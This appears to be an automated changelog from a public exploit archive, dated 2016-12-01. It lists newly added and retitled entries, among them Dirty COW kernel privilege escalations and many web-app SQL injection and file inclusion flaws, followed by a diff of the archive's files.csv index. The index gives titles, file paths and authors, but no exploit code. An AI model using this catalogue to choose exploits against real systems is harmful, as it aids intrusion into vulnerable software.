DB: 2016-12-01

7 new exploits

Xitami Web Server 5.0a0 - Denial of Service
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access)
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access)
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access)

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)
WinPower 4.9.0.4 - Privilege Escalation

Internet PhotoShow (page) - Remote File Inclusion
Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion

EQdkp 1.3.0 - (dbal.php) Remote File Inclusion
EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion

CaLogic Calendars 1.2.2 - (CLPath) Remote File Inclusion
CaLogic Calendars 1.2.2 - 'CLPath' Remote File Inclusion

MercuryBoard 1.1.4 - (User-Agent) SQL Injection
MercuryBoard 1.1.4 - 'User-Agent' SQL Injection

EQdkp 1.3.1 - (Referer Spoof) Remote Database Backup
EQdkp 1.3.1 - 'Referer Spoof' Remote Database Backup

Web Slider 0.6 - (path) Remote File Inclusion
Web Slider 0.6 - 'path' Parameter Remote File Inclusion

Zomplog 3.8 - (mp3playlist.php speler) SQL Injection
Zomplog 3.8 - 'mp3playlist.php' SQL Injection

EQdkp 1.3.2 - (listmembers.php rank) SQL Injection
EQdkp 1.3.2 - 'listmembers.php' SQL Injection

CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection
CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection

ActiveKB KnowledgeBase 2.x - 'catId' SQL Injection
ActiveKB KnowledgeBase 2.x - 'catId' Parameter SQL Injection

Zomplog 3.8.1 - upload_files.php Arbitrary File Upload
Zomplog 3.8.1 - Arbitrary File Upload

CMS Made Simple 1.2.2 - (TinyMCE module) SQL Injection
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection

Mega File Hosting Script 1.2 - (fid) SQL Injection
Mega File Hosting Script 1.2 - 'fid' Parameter SQL Injection

CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload
AJ HYIP ACME - 'topic_detail.php id' SQL Injection
EQDKP 1.3.2f - (user_id) Authentication Bypass (PoC)
e107 Plugin BLOG Engine 2.2 - (rid) Blind SQL Injection
AJ HYIP ACME - 'topic_detail.php' SQL Injection
EQdkp 1.3.2f - 'user_id' Authentication Bypass (PoC)
e107 Plugin BLOG Engine 2.2 - 'rid' Parameter Blind SQL Injection

CaLogic Calendars 1.2.2 - (langsel) SQL Injection
CaLogic Calendars 1.2.2 - 'langsel' Parameter SQL Injection
EMO Realty Manager - 'news.php ida' SQL Injection
The Real Estate Script - 'dpage.php docID' SQL Injection
Linkspile - 'link.php cat_id' SQL Injection
Freelance Auction Script 1.0 - (browseproject.php) SQL Injection
EMO Realty Manager - 'ida' Parameter SQL Injection
The Real Estate Script - 'docID' Parameter SQL Injection
Linkspile - 'cat_id' Parameter SQL Injection
Freelance Auction Script 1.0 - 'browseproject.php' SQL Injection
rgboard 3.0.12 - (Remote File Inclusioni / Cross-Site Scripting) Multiple Vulnerabilities
Kostenloses Linkmanagementscript - (page_to_include) Remote File Inclusion
rgboard 3.0.12 - Remote File Inclusioni / Cross-Site Scripting
Kostenloses Linkmanagementscript - Remote File Inclusion
newsmanager 2.0 - (Remote File Inclusion / File Disclosure / SQL Injection / pb) Multiple Vulnerabilities
68 Classifieds 4.0 - (category.php cat) SQL Injection
newsmanager 2.0 - Remote File Inclusion / File Disclosure / SQL Injection
68 Classifieds 4.0 - 'category.php' SQL Injection

StanWeb.CMS - (default.asp id) SQL Injection
StanWeb.CMS - SQL Injection

Archangel Weblog 0.90.02 - (post_id) SQL Injection
Archangel Weblog 0.90.02 - 'post_id' Parameter SQL Injection

WR-Meeting 1.0 - (msnum) Local File Disclosure
WR-Meeting 1.0 - 'msnum' Parameter Local File Disclosure
FicHive 1.0 - (category) Blind SQL Injection
Smeego 1.0 - (Cookie lang) Local File Inclusion
FicHive 1.0 - 'category' Parameter Blind SQL Injection
Smeego 1.0 - 'Cookie lang' Local File Inclusion

TAGWORX.CMS - Multiple SQL Injections
TAGWORX.CMS 3.00.02 - Multiple SQL Injections
lulieblog 1.2 - Multiple Vulnerabilities
AlkalinePHP 0.77.35 - (adduser.php) Arbitrary Add Admin
easycms 0.4.2 - Multiple Vulnerabilities
Lulieblog 1.2 - Multiple Vulnerabilities
AlkalinePHP 0.77.35 - 'adduser.php' Arbitrary Add Admin
Easycms 0.4.2 - Multiple Vulnerabilities

AlkalinePHP 0.80.00 Beta - (thread.php id) SQL Injection
AlkalinePHP 0.80.00 Beta - 'thread.php' SQL Injection

EntertainmentScript - 'play.php id' SQL Injection
EntertainmentScript 1.4.0 - 'play.php' SQL Injection
ecms 0.4.2 - (SQL Injection / Security Bypass) Multiple Vulnerabilities
Mantis Bug Tracker 1.1.1 - (Code Execution / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
ComicShout 2.5 - (index.php comic_id) SQL Injection
eCMS 0.4.2 - SQL Injection / Security Bypass
Mantis Bug Tracker 1.1.1 - Code Execution / Cross-Site Scripting / Cross-Site Request Forgery
ComicShout 2.5 - 'comic_id' Parameter SQL Injection
PHP Jokesite 2.0 - 'cat_id' SQL Injection
Netious CMS 0.4 - (index.php pageid) SQL Injection
PHP Jokesite 2.0 - 'cat_id' Parameter SQL Injection
Netious CMS 0.4 - 'pageid' Parameter SQL Injection
6rbScript - 'news.php newsid' SQL Injection
webl?sninger 4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
6rbScript - 'news.php' SQL Injection
Weblosninger 4 - Cross-Site Scripting / SQL Injection
e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection
Quate CMS 0.3.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting / dt) Multiple Vulnerabilities
e107 Plugin BLOG Engine 2.2 - 'uid' Parameter Blind SQL Injection
Quate CMS 0.3.4 - Multiple Vulnerabilities
RoomPHPlanning 1.5 - (idresa) SQL Injection
PHPRaider 1.0.7 - (PHPbb3.functions.php) Remote File Inclusion
RoomPHPlanning 1.5 - 'idresa' Parameter SQL Injection
PHPRaider 1.0.7 - 'PHPbb3.functions.php' Remote File Inclusion

CMS MAXSITE 1.10 - (category) SQL Injection
CMS MAXSITE 1.10 - 'category' Parameter SQL Injection

CKGold Shopping Cart 2.5 - (category_id) SQL Injection
CKGold Shopping Cart 2.5 - 'category_id' Parameter SQL Injection

ComicShout 2.8 - (news.php news_id) SQL Injection
ComicShout 2.8 - 'news_id' Parameter SQL Injection

AJ HYIP ACME - 'news.php id' SQL Injection
AJ HYIP ACME - 'news.php' SQL Injection

Quate CMS 0.3.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting

e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection
e107 Plugin BLOG Engine 2.2 - 'uid' Parameter SQL Injection
AJ HYIP ACME - 'comment.php artid' SQL Injection
AJ HYIP ACME - 'readarticle.php artid' SQL Injection
AJ HYIP ACME - 'comment.php' SQL Injection
AJ HYIP ACME - 'readarticle.php' SQL Injection

6rbScript 3.3 - 'singerid' SQL Injection
6rbScript 3.3 - 'singerid' Parameter SQL Injection

6rbScript 3.3 - (section.php name) Local File Inclusion
6rbScript 3.3 - 'section.php' Local File Inclusion

RoomPHPlanning 1.6 - (userform.php) Create Admin User Exploit
RoomPHPlanning 1.6 - 'userform.php' Create Admin User

Mega File Hosting Script 1.2 - (cross.php url) Remote File Inclusion
Mega File Hosting Script 1.2 - 'url' Parameter Remote File Inclusion

Advanced Image Hosting (AIH) 2.3 - (gal) Blind SQL Injection
Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection

ActiveKB KnowledgeBase - 'loadpanel.php Panel' Local File Inclusion
ActiveKB KnowledgeBase - 'Panel' Parameter Local File Inclusion

Quate CMS 0.3.5 - (Remote File Inclusioni / Local File Inclusion) Multiple Vulnerabilities
Quate CMS 0.3.5 - Remote File Inclusion / Local File Inclusion

Zomplog CMS 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities
Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery

YABSoft Advanced Image Hosting Script - SQL Injection
Advanced Image Hosting Script - SQL Injection

MercuryBoard 1.1 - index.php SQL Injection
MercuryBoard 1.1 - 'index.php' SQL Injection

CMS Made Simple 0.10 - Lang.php Remote File Inclusion
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion

Zomplog 3.3/3.4 - detail.php HTML Injection
Zomplog 3.3/3.4 - 'detail.php' HTML Injection

CMS Made Simple 1.0.2 - SearchInput Cross-Site Scripting
CMS Made Simple 1.0.2 - 'SearchInput' Parameter Cross-Site Scripting

EQDKP 1.3.1 - Show Variable Cross-Site Scripting
EQdkp 1.3.1 - Cross-Site Scripting

CMS Made Simple 105 - Stylesheet.php SQL Injection
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection

Internet PhotoShow - 'login_admin' Parameter Unauthorized Access

68 Classifieds 4.1 - 'login.php' goto Parameter Cross-Site Scripting
68 Classifieds 4.1 - 'login.php' Cross-Site Scripting

68 Classifieds 4.1 - category.php cat Parameter Cross-Site Scripting
68 Classifieds 4.1 - 'category.php' Cross-Site Scripting
68 Classifieds 4.1 - searchresults.php page Parameter Cross-Site Scripting
68 Classifieds 4.1 - toplistings.php page Parameter Cross-Site Scripting
68 Classifieds 4.1 - viewlisting.php view Parameter Cross-Site Scripting
68 Classifieds 4.1 - viewmember.php member Parameter Cross-Site Scripting
68 Classifieds 4.1 - 'searchresults.php' Cross-Site Scripting
68 Classifieds 4.1 - 'toplistings.php' Cross-Site Scripting
68 Classifieds 4.1 - 'viewlisting.php' Cross-Site Scripting
68 Classifieds 4.1 - 'viewmember.php' Cross-Site Scripting

YABSoft Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting
Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting

CMS Made Simple Download Manager 1.4.1 Module - Arbitrary File Upload
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload

CMS Made Simple Antz Toolkit 1.02 Module - Arbitrary File Upload
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload

Zomplog 3.9 - 'message' Parameter Multiple Cross-Site Scripting Vulnerabilities
Zomplog 3.9 - 'message' Parameter Cross-Site Scripting

YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting
Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting
Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion
Joomla! Component Catalog 1.0.7 - SQL Injection
Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection
Xfinity Gateway - Cross-Site Request Forgery

files.csv

@@ -3996,6 +3996,7 @@ id,file,description,date,author,platform,type,port
 31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000
 31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication - Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0
 31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555
+40849,platforms/windows/dos/40849.py,"Xitami Web Server 5.0a0 - Denial of Service",2016-11-30,"Stefan Petrushevski",windows,dos,0
 31815,platforms/linux/dos/31815.html,"libxslt XSL 1.1.23 - File Processing Buffer Overflow",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0
 31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service",2008-05-21,0x000000,multiple,dos,0
 31818,platforms/windows/dos/31818.sh,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",windows,dos,0
@@ -8641,8 +8642,8 @@ id,file,description,date,author,platform,type,port
 40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
-40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
+40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access)",2016-10-19,"Phil Oester",linux,local,0
-40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation",2016-10-21,"Robin Verton",linux,local,0
+40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
 40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0
 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0
 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
@@ -8656,7 +8657,7 @@ id,file,description,date,author,platform,type,port
 40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
 40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
-40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access)",2016-10-26,"Phil Oester",linux,local,0
+40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access)",2016-10-26,"Phil Oester",linux,local,0
 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
@@ -8666,7 +8667,9 @@ id,file,description,date,author,platform,type,port
 40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0
 40811,platforms/linux/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,linux,local,0
 40812,platforms/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0
-40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation",2016-11-28,FireFart,linux,local,0
+40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)",2016-11-28,FireFart,linux,local,0
+40847,platforms/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)",2016-11-27,"Gabriele Bonacini",linux,local,0
+40848,platforms/windows/local/40848.java,"WinPower 4.9.0.4 - Privilege Escalation",2016-11-29,"Kacper Szurek",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -16060,7 +16063,7 @@ id,file,description,date,author,platform,type,port
 1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,php,webapps,0
 1686,platforms/php/webapps/1686.pl,"FlexBB 0.5.5 - (/inc/start.php _COOKIE) SQL Bypass Exploit",2006-04-17,Devil-00,php,webapps,0
 1687,platforms/php/webapps/1687.txt,"MyEvent 1.3 - (myevent_path) Remote File Inclusion",2006-04-17,botan,php,webapps,0
-1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0
+1694,platforms/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0
 1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps,0
 1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution",2006-04-19,rgod,php,webapps,0
 1698,platforms/php/webapps/1698.php,"Joomla! 1.0.7 / Mambo 4.5.3 - (feed) Full Path Disclosure / Denial of Service",2006-04-19,trueend5,php,webapps,0
@@ -16101,7 +16104,7 @@ id,file,description,date,author,platform,type,port
 1760,platforms/php/webapps/1760.php,"PHP-Fusion 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0
 1761,platforms/php/webapps/1761.pl,"Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion",2006-05-07,beford,php,webapps,0
 1763,platforms/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0
-1764,platforms/php/webapps/1764.txt,"EQdkp 1.3.0 - (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0
+1764,platforms/php/webapps/1764.txt,"EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0
 1765,platforms/php/webapps/1765.pl,"Dokeos Lms 1.6.4 - (authldap.php) Remote File Inclusion",2006-05-08,beford,php,webapps,0
 1766,platforms/php/webapps/1766.pl,"Claroline E-Learning 1.75 - (ldap.inc.php) Remote File Inclusion",2006-05-08,beford,php,webapps,0
 1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server 8.23 - (rf) Remote File Inclusion",2006-05-08,Aesthetico,php,webapps,0
@@ -16126,7 +16129,7 @@ id,file,description,date,author,platform,type,port
 1805,platforms/php/webapps/1805.pl,"phpListPro 2.0.1 - 'Language' Remote Code Execution",2006-05-19,[Oo],php,webapps,0
 1807,platforms/asp/webapps/1807.txt,"Zix Forum 1.12 - 'layid' SQL Injection",2006-05-19,FarhadKey,asp,webapps,0
 1808,platforms/php/webapps/1808.txt,"phpMyDirectory 10.4.4 - 'ROOT_PATH' Remote File Inclusion",2006-05-19,OLiBekaS,php,webapps,0
-1809,platforms/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 - (CLPath) Remote File Inclusion",2006-05-20,Kacper,php,webapps,0
+1809,platforms/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 - 'CLPath' Remote File Inclusion",2006-05-20,Kacper,php,webapps,0
 1810,platforms/php/webapps/1810.pl,"Woltlab Burning Board 2.3.5 - (links.php) SQL Injection",2006-05-20,666,php,webapps,0
 1811,platforms/php/webapps/1811.php,"XOOPS 2.0.13.2 - xoopsOption[nocommon] Remote Exploit",2006-05-21,rgod,php,webapps,0
 1812,platforms/php/webapps/1812.pl,"Fusion News 1.0 (fil_config) - Remote File Inclusion",2006-05-21,X0r_1,php,webapps,0
@@ -16430,7 +16433,7 @@ id,file,description,date,author,platform,type,port
 2239,platforms/php/webapps/2239.txt,"Empire CMS 3.7 - (checklevel.php) Remote File Inclusion",2006-08-22,"Bob Linuson",php,webapps,0
 2240,platforms/php/webapps/2240.txt,"HPE 1.0 - (HPEinc) Remote File Inclusion (2)",2006-08-22,"the master",php,webapps,0
 2243,platforms/php/webapps/2243.php,"Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0
-2247,platforms/php/webapps/2247.php,"MercuryBoard 1.1.4 - (User-Agent) SQL Injection",2006-08-23,rgod,php,webapps,0
+2247,platforms/php/webapps/2247.php,"MercuryBoard 1.1.4 - 'User-Agent' SQL Injection",2006-08-23,rgod,php,webapps,0
 2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod 1.5.0 - (start) SQL Injection",2006-08-23,SpiderZ,php,webapps,0
 2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - (lvc_include_dir) Remote File Inclusion",2006-08-23,"Mehmet Ince",php,webapps,0
 2250,platforms/php/webapps/2250.pl,"Integramod Portal 2.x - (functions_portal.php) Remote File Inclusion",2006-08-23,nukedx,php,webapps,0
@@ -17161,7 +17164,7 @@ id,file,description,date,author,platform,type,port
 3249,platforms/php/webapps/3249.txt,"WebBuilder 2.0 - (StageLoader.php) Remote File Inclusion",2007-02-01,GoLd_M,php,webapps,0
 3250,platforms/php/webapps/3250.txt,"Portail Web PHP 2.5.1 - 'includes.php' Remote File Inclusion",2007-02-01,"laurent gaffié",php,webapps,0
 3251,platforms/php/webapps/3251.txt,"CoD2: DreamStats 4.2 - 'index.php' Remote File Inclusion",2007-02-02,"ThE dE@Th",php,webapps,0
-3252,platforms/php/webapps/3252.txt,"EQdkp 1.3.1 - (Referer Spoof) Remote Database Backup",2007-02-02,Eight10,php,webapps,0
+3252,platforms/php/webapps/3252.txt,"EQdkp 1.3.1 - 'Referer Spoof' Remote Database Backup",2007-02-02,Eight10,php,webapps,0
 3253,platforms/php/webapps/3253.txt,"Flipper Poll 1.1.0 - (poll.php root_path) Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0
 3255,platforms/php/webapps/3255.php,"F3Site 2.1 - Remote Code Execution",2007-02-02,Kacper,php,webapps,0
 3256,platforms/php/webapps/3256.txt,"dB Masters Curium CMS 1.03 - (c_id) SQL Injection",2007-02-02,ajann,php,webapps,0
@@ -17458,7 +17461,7 @@ id,file,description,date,author,platform,type,port
 3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 - (footer.php template) Local File Inclusion",2007-04-15,BeyazKurt,php,webapps,0
 3743,platforms/php/webapps/3743.txt,"Gallery 1.2.5 - (GALLERY_BASEDIR) Multiple Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0
 3744,platforms/php/webapps/3744.txt,"audioCMS arash 0.1.4 - (arashlib_dir) Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0
-3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 - (path) Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0
+3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 - 'path' Parameter Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0
 3747,platforms/php/webapps/3747.txt,"openMairie 1.10 - (scr/soustab.php) Local File Inclusion",2007-04-16,GoLd_M,php,webapps,0
 3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion",2007-04-16,irvian,php,webapps,0
 3749,platforms/php/webapps/3749.txt,"StoreFront for Gallery - (GALLERY_BASEDIR) Remote File Inclusion",2007-04-16,"Alkomandoz Hacker",php,webapps,0
@@ -17586,7 +17589,7 @@ id,file,description,date,author,platform,type,port
 3948,platforms/php/webapps/3948.txt,"Libstats 1.0.3 - (template_csv.php) Remote File Inclusion",2007-05-18,"Mehmet Ince",php,webapps,0
 3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - (index.php lang) Local File Inclusion",2007-05-18,MurderSkillz,php,webapps,0
 3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 - (root) Remote File Inclusion",2007-05-19,"Mehmet Ince",php,webapps,0
-3955,platforms/php/webapps/3955.py,"Zomplog 3.8 - (mp3playlist.php speler) SQL Injection",2007-05-20,NeoMorphS,php,webapps,0
+3955,platforms/php/webapps/3955.py,"Zomplog 3.8 - 'mp3playlist.php' SQL Injection",2007-05-20,NeoMorphS,php,webapps,0
 3956,platforms/php/webapps/3956.php,"Alstrasoft e-Friends 4.21 - Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0
 3957,platforms/php/webapps/3957.php,"Alstrasoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0
 3958,platforms/php/webapps/3958.php,"Alstrasoft Template Seller Pro 3.25 - Admin Password Change",2007-05-20,BlackHawk,php,webapps,0
@@ -17625,7 +17628,7 @@ id,file,description,date,author,platform,type,port
 4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution",2007-06-02,Kacper,php,webapps,0
 4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - (index.php c) SQL Injection",2007-06-03,Kacper,php,webapps,0
 4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution",2007-06-04,Silentz,php,webapps,0
-4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - (listmembers.php rank) SQL Injection",2007-06-04,Silentz,php,webapps,0
+4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - 'listmembers.php' SQL Injection",2007-06-04,Silentz,php,webapps,0
 4031,platforms/php/webapps/4031.txt,"Madirish Webmail 2.0 - (addressbook.php) Remote File Inclusion",2007-06-04,BoZKuRTSeRDaR,php,webapps,0
 4034,platforms/php/webapps/4034.txt,"Kravchuk letter script 1.0 - (scdir) Remote File Inclusion",2007-06-05,"Mehmet Ince",php,webapps,0
 4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 - index.php 'epi' SQL Injection (1)",2007-06-05,s0cratex,php,webapps,0
@@ -17800,7 +17803,7 @@ id,file,description,date,author,platform,type,port
 4342,platforms/php/webapps/4342.txt,"NMDeluxe 2.0.0 - 'id' SQL Injection",2007-08-30,"not sec group",php,webapps,0
 4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 - (uploadmedia.cgi) Arbitrary File Upload",2007-08-30,Don,cgi,webapps,0
 4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,php,webapps,0
-4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection",2007-08-31,k1tk4t,php,webapps,0
+4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection",2007-08-31,k1tk4t,php,webapps,0
 4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection",2007-09-01,Silentz,php,webapps,0
 4352,platforms/php/webapps/4352.txt,"Weblogicnet - (files_dir) Multiple Remote File Inclusion",2007-09-02,bius,php,webapps,0
 4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - (error_view.php ID) SQL Injection",2007-09-02,k1tk4t,php,webapps,0
@@ -17868,13 +17871,13 @@ id,file,description,date,author,platform,type,port
 4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion",2007-09-26,kezzap66345,php,webapps,0
 4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS - 'id' SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0
 4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - (notas.asp nota_id) SQL Injection",2007-09-26,ka0x,asp,webapps,0
-4459,platforms/php/webapps/4459.txt,"ActiveKB KnowledgeBase 2.x - 'catId' SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0
